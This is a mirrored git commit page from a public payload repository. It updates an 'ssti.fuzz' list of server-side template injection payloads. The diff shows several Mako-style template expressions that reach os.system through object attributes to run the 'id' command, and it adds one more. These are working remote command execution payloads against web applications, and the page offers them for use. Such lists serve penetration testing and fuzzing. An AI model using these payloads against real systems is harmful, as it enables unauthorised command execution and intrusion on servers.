mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2026-01-13 05:16:15 -08:00
Update ssti.fuzz
This commit is contained in:
@@ -51,3 +51,4 @@ ${self.module.runtime.util.os.system("id")}
|
||||
${self.template.module.cache.util.os.system("id")}
|
||||
${self.module.cache.compat.inspect.os.system("id")}
|
||||
${self.__init__.__globals__['util'].os.system('id')}
|
||||
${self.template.module.runtime.util.os.system("id")}
|
||||
|
||||
Reference in New Issue
Block a user